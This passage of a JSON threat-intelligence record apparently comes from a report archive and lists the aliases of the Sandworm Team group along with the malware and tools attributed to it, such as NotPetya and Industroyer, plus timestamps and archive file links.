"source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434529, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/04c5ac3a675ed9ec9d11754dc05abc75c71b0c2e.pdf", "text": "https://archive.orkl.eu/04c5ac3a675ed9ec9d11754dc05abc75c71b0c2e.txt", "img": "https://archive.orkl.eu/04c5ac3a675ed9ec9d11754dc05abc75c71b0c2e.jpg" } }